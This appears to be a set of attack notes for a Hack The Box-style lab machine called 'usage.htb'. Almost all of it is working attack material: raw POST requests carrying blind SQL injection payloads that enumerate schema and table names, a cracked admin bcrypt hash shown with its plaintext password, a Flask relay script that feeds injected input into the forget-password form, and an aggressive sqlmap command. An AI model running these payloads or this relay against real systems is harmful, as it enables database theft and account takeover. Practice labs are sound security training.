- // Telegram : @HTB0X
- # to find DB name
- POST /forget-password HTTP/1.1
- Host: usage.htb
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: ar,en-US;q=0.7,en;q=0.3
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 168
- Origin: http://usage.htb
- Connection: close
- Referer: http://usage.htb/forget-password
- Cookie: XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGFnIjoiIn0%3D
- Upgrade-Insecure-Requests: 1
- _token=DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt&email=ali%40ali.com'+and+(select+substring((SELECT+schema_name+FROM+information_schema.schemata+limit+2,1),1,1)='u')--+-
- --------------------------------------------
- # to find table names
- POST /forget-password HTTP/1.1
- Host: usage.htb
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: ar,en-US;q=0.7,en;q=0.3
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 206
- Origin: http://usage.htb
- Connection: close
- Referer: http://usage.htb/forget-password
- Cookie: XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGFnIjoiIn0%3D
- Upgrade-Insecure-Requests: 1
- _token=DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt&email=ali%40ali.com'+and+(select+(select+substring((select+table_name+from+information_schema.tables+where+table_schema='usage_blog'+limit+3,1),1,1))='a')--+-
- ------------------------------
- admin user and pass
- admin:$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 password => whatever1
- -----
- # to make sqlmap inject
- # use this Python code to work as a proxy that follows the redirect
- from flask import Flask, request, jsonify
- import requests
# Flask application object; the single relay endpoint below is registered on it.
app = Flask(__name__)
@app.route('/proxy', methods=['GET'])
def proxy():
    """Relay the GET ``inject`` parameter into a POST to the forget-password form.

    Whatever arrives in ``?inject=`` is placed verbatim into the ``email``
    field of a POST to ``url`` and the body of the upstream response is
    returned to the caller unchanged. ``requests.post`` is called with its
    defaults, so HTTP redirects are followed automatically.

    Returns:
        The upstream response body as text (``response.text``).
    """
    # Extract the 'inject' parameter from the GET request; empty string when absent.
    user_input = request.args.get('inject', '')
    # Define the URL to which the POST request will be sent
    url = 'http://usage.htb/forget-password'
    # Define the headers for the POST request. The Cookie value is a fixed,
    # previously captured session; once that session expires or rotates the
    # relay no longer reproduces the original request.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'ar,en-US;q=0.7,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://usage.htb',
        'Connection': 'close',
        'Referer': 'http://usage.htb/forget-password',
        'Cookie': 'XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGdgIjoiIn0=; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGdgIjoiIn0='
    }
    # Define the data to be sent in the POST request. '_token' is presumably
    # the Laravel CSRF token belonging to the session in the Cookie header
    # above, so the two must stay paired.
    data = {
        '_token': 'DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt',
        'email': user_input  # user-provided input is placed unmodified into the email field
    }
    # Send the POST request. No timeout= is given, so an unresponsive upstream
    # blocks this handler indefinitely.
    response = requests.post(url, headers=headers, data=data)
    # Return the content of the response from the target server
    return response.text
if __name__ == '__main__':
    # debug=True enables the auto-reloader and the Werkzeug interactive
    # debugger; the debugger lets a browser that reaches a traceback page run
    # Python inside this process. Leave the listener on the Flask default of
    # localhost and do not bind it to a network-reachable address.
    app.run(debug=True)
# sqlmap -u "http://127.0.0.1:5000/proxy?inject=ali@ali.com" --technique=B --threads 10 --batch --level 5 --risk 3 --dbs